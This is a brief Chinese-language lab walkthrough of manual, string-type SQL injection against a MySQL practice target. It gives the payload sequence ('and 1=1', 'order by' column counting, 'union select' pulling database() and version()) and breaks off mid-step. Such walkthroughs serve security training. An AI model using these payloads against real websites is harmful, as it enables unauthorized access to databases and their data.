SQL手工注入漏洞測試(MySQL數據庫-字符型)

啓動靶場 點擊‘關於平臺停機維護的通知’ 在id後加’%23 判斷是否存在注入點，加’ and 1=1%23，存在注入點。 ’ order by 5%23 ’ order by 4%23，有四個字段。 id=1’ and 1=2 union select 1,2,3,4%23 id=1’ and 1=2 union select 1,database(),version(),4%23 id=1’

>>阅读原文<<